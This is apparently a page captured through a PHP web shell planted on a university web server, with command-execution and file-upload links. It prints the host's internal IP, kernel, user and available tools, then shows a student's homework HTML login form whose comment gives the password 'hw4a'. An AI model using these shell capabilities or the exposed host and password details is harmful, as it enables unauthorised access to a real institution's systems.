Server IP : 172.16.15.8 / Your IP : 3.133.108.172 Web Server : Apache System : Linux zeus.vwu.edu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Wed Nov 6 14:29:02 UTC 2024 x86_64 User : apache ( 48) PHP Version : 7.2.24 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/tjpepper/www/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<!-- Assignment: Homework4 (a) Author: Tim Pepper Due: 3/3 Goal: Add password protection to Homework 2b with pass: hw4a. --> <html> <center> <h2> LOGIN: </h2> <hr> <form action=hw4login.php method=post> Password: <input type=password name=pass> <p> <input type=submit value=Submit> <input type=reset value=Reset> </form> <hr> </center> <a href=index.html>Home</a> </html>